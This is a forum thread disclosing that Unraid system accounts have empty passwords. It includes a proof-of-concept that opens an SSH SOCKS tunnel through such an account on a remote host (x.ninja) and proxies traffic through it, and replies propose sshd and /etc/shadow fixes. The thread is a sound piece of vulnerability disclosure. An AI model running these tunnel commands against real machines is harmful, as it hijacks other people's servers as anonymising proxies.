Jump to content
Mihai

No passwords for system users - unraid can be used as a rogue ssh tunnel

8 posts in this topic Last Reply

Recommended Posts

Hello guys,

 

I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.

 

Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```

 

Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:

```

$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.

$

```

 

But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.

 

```

$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh   

```

Voila! then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.

 

An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`

 

Cheerio,

Mihai

 

Share this post


Link to post

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )

```

[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N bin@x.ninja -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#

```

Share this post


Link to post

Thanks for reporting, I have made an internal report for follow-up.

Share this post


Link to post
21 hours ago, Mihai said:

An easy fix would be:

Would it be better to change this line in /etc/ssh/sshd_config

PermitEmptyPasswords yes

to

PermitEmptyPasswords no

 

Share this post


Link to post

Or.. how about if we add this to sshd_config:

AllowTcpForwarding no
Match Group root
AllowTcpForwarding yes

Then only 'root' user can set up forwarding.

Share this post


Link to post

I would use these sshd configurations + setting the users disabled. I don't think having users with empty passwords is a good idea.

Thanks for the fast reply!

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.